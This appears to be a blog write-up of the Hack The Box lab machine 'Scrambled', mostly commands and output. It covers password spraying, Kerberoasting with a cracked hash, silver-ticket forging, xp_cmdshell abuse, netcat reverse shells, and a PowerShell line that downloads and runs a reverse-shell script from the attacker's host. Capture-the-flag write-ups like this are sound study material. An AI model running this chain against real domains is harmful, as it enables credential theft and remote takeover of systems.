Post

Hack The Box - Scrambled

Hack The Box - Scrambled

User

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
PORT      STATE SERVICE        REASON
53/tcp    open  domain         syn-ack
80/tcp    open  http           syn-ack
88/tcp    open  kerberos-sec   syn-ack
135/tcp   open  msrpc          syn-ack
139/tcp   open  netbios-ssn    syn-ack
464/tcp   open  kpasswd5       syn-ack
593/tcp   open  http-rpc-epmap syn-ack
1433/tcp  open  ms-sql-s       syn-ack
3268/tcp  open  globalcatLDAP  syn-ack
4411/tcp  open  found          syn-ack
5985/tcp  open  wsman          syn-ack
9389/tcp  open  adws           syn-ack
49667/tcp open  unknown        syn-ack
49673/tcp open  unknown        syn-ack
49674/tcp open  unknown        syn-ack
49700/tcp open  unknown        syn-ack
49714/tcp open  unknown        syn-ack

from port 80 user ksimpson

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
❯ kerbrute passwordspray -d scrm.local --dc 10.129.10.13 users.txt ksimpson

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: dev (n/a) - 07/02/26 - Ronnie Flathers @ropnop

2026/07/02 06:57:22 >  Using KDC(s):
2026/07/02 06:57:22 >  	10.129.10.13:88

2026/07/02 06:57:22 >  [+] VALID LOGIN:	ksimpson@scrm.local:ksimpson
2026/07/02 06:57:22 >  Done! Tested 1 logins (1 successes) in 0.356 seconds
1
2
3
4
❯ getTGT.py 'scrm.local/ksimpson:ksimpson' -dc-ip 10.129.10.13
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in ksimpson.ccache
1
export KRB5CCNAME=ksimpson.ccache

use klist to verify it.

❯ smbclient.py -k -no-pass -dc-ip 10.129.10.13 scrm.local/ksimpson@dc1.scrm.local

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
# shares
Share Name                Type            Comment
----------------------------------------------------------------------
ADMIN$                    DISK (SPECIAL)  Remote Admin
C$                        DISK (SPECIAL)  Default share
HR                        DISK            
IPC$                      IPC (SPECIAL)   Remote IPC
IT                        DISK            
NETLOGON                  DISK            Logon server share 
Public                    DISK            
Sales                     DISK            
SYSVOL                    DISK            Logon server share 
# use Public
# mget *
[*] Downloading Network Security Changes.pdf
1
2
3
4
5
6
7
8
9
10
11
❯ GetUserSPNs.py -k -no-pass scrm.local/ksimpson -dc-host dc1.scrm.local -request
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName          Name    MemberOf  PasswordLastSet             LastLogon                   Delegation 
----------------------------  ------  --------  --------------------------  --------------------------  ----------
MSSQLSvc/dc1.scrm.local:1433  sqlsvc            2021-11-03 22:02:02.351452  2026-07-02 06:29:40.277817             
MSSQLSvc/dc1.scrm.local       sqlsvc            2021-11-03 22:02:02.351452  2026-07-02 06:29:40.277817             



$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$a853cdf76987c584f10befc33765f78a$6b61955a9ace07a5586fdc5b53e15ad5e2707849b29d5601e7954251eecefe2ba150a963504aa0283911e93f998c7892b423a013f0325fe2cfd4ce902966d74af9acd5ccc0607d0e15f85ec9a5ca3b5b780b7c7db5143ef099b54f9754f3f19e8a70ded103929158afe2f1ffff1bd986c02a84a089d3cae3b19326e31fbf7be2f830c1e9505a19fb31aa4f262ffa3f181d9d1366b254724e952826bd92868bd20682198a52dad493f2ba4ec4d1d95ced4411144da500a47cb40c4718829f336339c91bee9291e8818a7f0a7f5257e1c958efb5b717f1634e536db54092ce1bd006356ed07a9bb3ab3c6beef18540b56549e109561e3aeae0ed5f27a0faefc7ac123d510250f55458ed06766144820efca5d76a6a0a528e7a06b3ad35bcfef248548a121ff3cad69ac4da62b7b1db452de8c8b8ae5b1c1948e16440c55dc31dfea0b839e7ada0f7ee7c5db092a4a0e612bad7a0cc36b5b3d29ea5bd0632914d9b77b64242e272133240575c851f424ae08780543f71765098fe3e370791d4bf0897ec337d95f63a773db7e8160a4dfa131bf6032320989afc05ca404a4634473e57c4ac46bad1378ceec12e62a55027fbd3aae71646d1fc888608a7d0db91a9693630a12c23abafc3833ef4052ccf0ac2532874d9e245fc07a5665a56dd610afe8a2b877c39475c911f852d7b397ff874ce3cdb810cbc4f3047bd9d85a86447e8d41a95d10d4ed81f28ba754bc5137bef8f60139ed53f2758767397fac033a6249baa23ade9bfb23d9f4d288a0dbe2283f081576325ed438f55d7eb1740d5d02e28d3a4f9ebe35f5a6063752f1b27bdd1d5ead4d3ec9ee39cd93d9068d3546b7c602eb0b21cdc692c3f9349be60e2682b00af8e8f6fcec8364d17c5dd9545c4a5062937aa89f6218c61ac01ab1e8c3bf42c2156e66f8339dd4ecf18ce93b72bfd3135a2e4d103582b9cbee106a8a8f22d3504c5b42959230ed590df5e6697337c39d9c664a9f837e677aba18619b6fd53a3fdc174edc984ad995febf3b34f07f90a7067edce1f51b2a0126383266708ae61f608204f4ce9bb299b66c9e46079b65caba4e83fb53cf664f3a96d446c686c65a3198123ed6ef8b4c35ee80d9ad11422a4319e887d79155f43175b273115d87494a1584b906fb78fe89c49d0254f30a0237032c7df9577eea20ff8655d7ed86c6ca818556ce3203c2be6c706562b71e708a6a534297d31d0987b97de05e549a974ce83b75e8ed896a83d4e785b8c1f6ff5a6d1444df63eb732a9a0df9e35c81a751b13b4d907e17a46af2a6852d5ef6595e2186bf1fc770655240f8df713183346c427ff35f1b59c24c2664ad29102a7e8a055f0d1c65567144e219c611a4bfb56a94a1ecc793354bf1c424a224760f6e7608fbf1ce1669b4f1015c13f035032b0daabb41a8a310165c6
1
$krb5tgs$23$*sqlsvc$SCRM.LOCAL$scrm.local/sqlsvc*$a853cdf76987c584f10befc33765f78a$6b61955a9ace07a5586fdc5b53e15ad5e2707849b29d5601e7954251eecefe2ba150a963504aa0283911e93f998c7892b423a013f0325fe2cfd4ce902966d74af9acd5ccc0607d0e15f85ec9a5ca3b5b780b7c7db5143ef099b54f9754f3f19e8a70ded103929158afe2f1ffff1bd986c02a84a089d3cae3b19326e31fbf7be2f830c1e9505a19fb31aa4f262ffa3f181d9d1366b254724e952826bd92868bd20682198a52dad493f2ba4ec4d1d95ced4411144da500a47cb40c4718829f336339c91bee9291e8818a7f0a7f5257e1c958efb5b717f1634e536db54092ce1bd006356ed07a9bb3ab3c6beef18540b56549e109561e3aeae0ed5f27a0faefc7ac123d510250f55458ed06766144820efca5d76a6a0a528e7a06b3ad35bcfef248548a121ff3cad69ac4da62b7b1db452de8c8b8ae5b1c1948e16440c55dc31dfea0b839e7ada0f7ee7c5db092a4a0e612bad7a0cc36b5b3d29ea5bd0632914d9b77b64242e272133240575c851f424ae08780543f71765098fe3e370791d4bf0897ec337d95f63a773db7e8160a4dfa131bf6032320989afc05ca404a4634473e57c4ac46bad1378ceec12e62a55027fbd3aae71646d1fc888608a7d0db91a9693630a12c23abafc3833ef4052ccf0ac2532874d9e245fc07a5665a56dd610afe8a2b877c39475c911f852d7b397ff874ce3cdb810cbc4f3047bd9d85a86447e8d41a95d10d4ed81f28ba754bc5137bef8f60139ed53f2758767397fac033a6249baa23ade9bfb23d9f4d288a0dbe2283f081576325ed438f55d7eb1740d5d02e28d3a4f9ebe35f5a6063752f1b27bdd1d5ead4d3ec9ee39cd93d9068d3546b7c602eb0b21cdc692c3f9349be60e2682b00af8e8f6fcec8364d17c5dd9545c4a5062937aa89f6218c61ac01ab1e8c3bf42c2156e66f8339dd4ecf18ce93b72bfd3135a2e4d103582b9cbee106a8a8f22d3504c5b42959230ed590df5e6697337c39d9c664a9f837e677aba18619b6fd53a3fdc174edc984ad995febf3b34f07f90a7067edce1f51b2a0126383266708ae61f608204f4ce9bb299b66c9e46079b65caba4e83fb53cf664f3a96d446c686c65a3198123ed6ef8b4c35ee80d9ad11422a4319e887d79155f43175b273115d87494a1584b906fb78fe89c49d0254f30a0237032c7df9577eea20ff8655d7ed86c6ca818556ce3203c2be6c706562b71e708a6a534297d31d0987b97de05e549a974ce83b75e8ed896a83d4e785b8c1f6ff5a6d1444df63eb732a9a0df9e35c81a751b13b4d907e17a46af2a6852d5ef6595e2186bf1fc770655240f8df713183346c427ff35f1b59c24c2664ad29102a7e8a055f0d1c65567144e219c611a4bfb56a94a1ecc793354bf1c424a224760f6e7608fbf1ce1669b4f1015c13f035032b0daabb41a8a310165c6:Pegasus60

Pegasus60

1
2
3
4
5
❯ kerbrute passwordspray -d scrm.local --dc 10.129.10.13 users.txt Pegasus60

[snip]

[+] VALID LOGIN:	sqlsvc@scrm.local:Pegasus60
1
2
3
4
❯ getTGT.py scrm.local/sqlsvc:Pegasus60 -dc-ip 10.129.12.93
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in sqlsvc.ccache

sqlsvc is the AD account whose Kerberos key protects tickets for MSSQLSvc/dc1.scrm.local:1433.

now performing silver attack

we need sid of the domain

1
2
3
4
❯ nxc ldap 10.129.12.95 --use-kcache --get-sid
LDAP        10.129.12.95    389    DC1              [*] None (name:DC1) (domain:SCRM.LOCAL) (signing:None) (channel binding:Never) (NTLM:False)
LDAP        10.129.12.95    389    DC1              [+] SCRM.LOCAL\sqlsvc from ccache 
LDAP        10.129.12.95    389    DC1              Domain SID S-1-5-21-2743207045-1827831105-2542523200

get ntlm hashes

1
2
3
4
5
6
7
❯ python3
Python 3.14.6 (main, Jun 15 2026, 11:36:54) [GCC 16.1.1 20260430] on linux
Type "help", "copyright", "credits" or "license" for more information.
>>> from impacket.ntlm import compute_nthash
>>> print(compute_nthash("Pegasus60").hex())
b999a16500b87d17ec7f2e2a68778f05
>>> 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
❯ ticketer.py -nthash b999a16500b87d17ec7f2e2a68778f05 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain scrm.local -spn MSSQLSvc/dc1.scrm.local Administrator
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies 

[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for scrm.local/Administrator
[*] 	PAC_LOGON_INFO
[*] 	PAC_CLIENT_INFO_TYPE
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] 	EncTicketPart
[*] 	EncTGSRepPart
[*] Saving/Updating ticket in Administrator.ccache
❯ export KRB5CCNAME=Administrator.ccache

now access ms-sql as Administrator

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
❯ mssqlclient.py scrm.local/Administrator@DC1.scrm.local -k -no-pass
Impacket v0.14.0.dev0+20260619.174856.9a5621d4 - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC1): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server 2019 RTM (15.0.2000)
[!] Press help for extra shell commands
SQL (SCRM\administrator  dbo@master)> exec sp_configure 'xp_cmdshell', 1;
INFO(DC1): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (SCRM\administrator  dbo@master)> RECONFIGURE;
SQL (SCRM\administrator  dbo@master)> exec xp_cmdshell 'whoami';
output        
-----------   
scrm\sqlsvc   
NULL          
SQL (SCRM\administrator  dbo@master)> 

now uploading nc.exe and establishing a reverse shell

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ nc -lnvp 9000
Listening on 0.0.0.0 9000
Connection received on 10.129.12.95 55389
Microsoft Windows [Version 10.0.17763.2989]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami
whoami
scrm\sqlsvc

C:\Windows\system32>whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                               State   
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token             Disabled
SeIncreaseQuotaPrivilege      Adjust memory quotas for a process        Disabled
SeMachineAccountPrivilege     Add workstations to domain                Disabled
SeChangeNotifyPrivilege       Bypass traverse checking                  Enabled 
SeImpersonatePrivilege        Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege       Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege Increase a process working set            Disabled

C:\Windows\system32>

juicypotato gives COM -> recv failed with error: 10038 and bloodhound gives no interesting path but we can still use juicypotatong (latest one) but that’s not the box’s intent since the exploit is new and the box is old but if we recall network security changes pdf file it talked about credentials in sql database. here are the credentials

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
SQL (SCRM\administrator  dbo@master)> use scramblehr
ENVCHANGE(DATABASE): Old Value: master, New Value: ScrambleHR
SQL (SCRM\administrator  dbo@ScrambleHR)> select name from sys.tables
name         
----------   
Employees    
UserImport   
Timesheets   
SQL (SCRM\administrator  dbo@ScrambleHR)> select * from employees
EmployeeID   FirstName   Surname   Title   Manager   Role   
----------   ---------   -------   -----   -------   ----   
SQL (SCRM\administrator  dbo@ScrambleHR)> select * from userimport
LdapUser   LdapPwd             LdapDomain   RefreshInterval   IncludeGroups   
--------   -----------------   ----------   ---------------   -------------   
MiscSvc    ScrambledEggs9900   scrm.local                90               0   
SQL (SCRM\administrator  dbo@ScrambleHR)> select * from timesheets
EmployeeID   TimeStart   TimeEnd   
----------   ---------   -------   
SQL (SCRM\administrator  dbo@ScrambleHR)> 

MiscSvc:ScrambledEggs9900

now since ntlm is disabled we’ll use powershell

C:\Users\sqlsvc>powershell                                                            
powershell
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\Users\sqlsvc> $pass = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
$pass = ConvertTo-SecureString "ScrambledEggs9900" -AsPlainText -Force
PS C:\Users\sqlsvc> $cred = New-Object System.Management.Automation.PSCredential ("scrm.local\MiscSvc", $pass)
$cred = New-Object System.Management.Automation.PSCredential ("scrm.local\MiscSvc", $pass)
PS C:\Users\sqlsvc> Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {whoami}
Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {whoami}
scrm\miscsvc

now edit the tail of InvokePowerShellTCP.ps1 for easier Reverse Shell

1
2
3
4
5
6
7
8
9
10
tail Invoke-PowerShellTcp.ps1
        }
    }
    catch
    {
        Write-Warning "Something went wrong! Check if the server is reachable and you are using the correct port." 
        Write-Error $_
    }
}
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.15.182 -Port 9001

on our sqlsvc shell

PS C:\Users\sqlsvc> Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.182:8000/Invoke-PowerShellTcp.ps1")}
Invoke-Command -ComputerName dc1.scrm.local -Credential $cred {IEX (New-Object Net.WebClient).DownloadString("http://10.10.15.182:8000/Invoke-PowerShellTcp.ps1")}

get user.txt

1
2
3
4
5
6
7
8
9
10
❯ nc -lnvp 9001
Listening on 0.0.0.0 9001
Connection received on 10.129.12.95 63816
Windows PowerShell running as user miscsvc on DC1
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Users\miscsvc\Documents>more ..\Desktop\user.txt
[snip]

PS C:\Users\miscsvc\Documents> 

Root

running winpeas we find some interesting services running

1
2
3
4
[snip]

Scramble Sales Orders Server(Scramble Sales Orders Server)[C:\Program Files\ScrambleCorp\SalesOrdersService\ScrambleServer.exe 4411] - Autoload - No quotes and Space detected
   =================================================================================================

we also have Shares Folder

1
2
3
4
5
6
7
8
9
10
11
12
13
14
PS C:\> ls

    Directory: C:\

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----       03/11/2021     23:44                inetpub
d-----       31/10/2021     21:13                PerfLogs
d-r---       01/06/2022     12:43                Program Files
d-----       03/11/2021     16:50                Program Files (x86)
d-----       01/11/2021     15:21                Shares
d-----       08/11/2021     00:39                Temp
d-r---       05/11/2021     14:56                Users
d-----       08/06/2022     23:39                Windows

interesting exe file as we saw earlier

1
2
3
4
5
6
    Directory: C:\Shares\IT\Apps\Sales Order Client

Mode                LastWriteTime         Length Name
----                -------------         ------ ---- 
-a----       05/11/2021     20:52          86528 ScrambleClient.exe
-a----       05/11/2021     20:52          19456 ScrambleLib.dll

now using deserialization bug we can get a reverse shell and root

This post is licensed under CC BY 4.0 by the author.